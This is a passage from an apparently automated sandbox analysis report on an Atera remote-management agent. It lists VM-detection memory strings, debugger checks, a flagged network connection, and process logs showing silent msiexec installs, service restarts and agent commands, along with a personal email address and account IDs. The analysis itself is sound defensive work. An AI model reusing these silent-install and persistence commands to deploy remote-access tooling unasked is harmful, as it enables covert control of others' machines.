                                Source: svchost.exe, 00000027.00000002.2561661126.000001F809124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{3c527940-1853-195e-fb1a-27cdb1f80e4a}6000C298128B8C02A71A2474AEB5F3DCVMware Virtual diskVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"p^G
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.pS#3
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStoppedc
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868717408.00000246D3E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2271850705.000001E44C39E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeate
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: svchost.exe, 00000027.00000002.2558931330.000001F808C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C298128B8C02A71A2474AEB5F3DC0
                                Source: svchost.exe, 00000027.00000002.2559534314.000001F808C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868947160.00000246D3E9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvssr
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @"VMware Virtual disk"
                                Source: svchost.exe, 00000027.00000002.2558931330.000001F808C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 :
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2272394045.000001E44C3A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicheartbeat"
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2451097545.000001327ADB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIE
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStoppedl
                                Source: svchost.exe, 00000027.00000002.2560155290.000001F808CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C298128B8C02A71A2474AEB5F3DCc02
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStoppedt
                                Source: svchost.exe, 00000027.00000002.2559730729.000001F808C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@"VMware"Buffer
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                                Source: svchost.exe, 00000005.00000002.2559031344.000002F5BF42B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1506477733.0000000003636000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1585649904.000001FD5A098000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1869950008.00000246D3FE8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2266637366.000002706E120000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2567716195.0000024845510000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2120854347.000001CC2B3E0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2134700713.00000165B09C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2280586571.000001E44C4B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
                                Source: svchost.exe, 00000027.00000002.2560155290.000001F808CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStopped
                                Source: svchost.exe, 00000027.00000002.2560155290.000001F808CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2149932355.000001E4332A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1812887385.0000022AC0862000.00000002.00000001.01000000.0000001F.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp, Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: get_IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2276825332.000001E44C4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{3c527940-1853-195e-fb1a-27cdb1f80e4a}"6000C298128B8C02A71A2474AEB5F3DCVMware Virtual diskVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp?
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SetPropValue.Manufacturer("VMware");
                                Source: svchost.exe, 00000027.00000002.2559534314.000001F808C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2451097545.000001327ADB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc
                                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB7B4C __crtCaptureCurrentContext,IsDebuggerPresent,__crtUnhandledException,37_2_00007FFB02EB7B4C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFAFB0 OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,SetEnvironmentVariableW,_errno,_errno,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_snprintf,OutputDebugStringA,37_2_00007FFB02EFAFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,37_2_00007FFB02EC1910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFAFB0 OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,SetEnvironmentVariableW,_errno,_errno,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_snprintf,OutputDebugStringA,37_2_00007FFB02EFAFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBACD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00007FFB02EBACD4
                                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
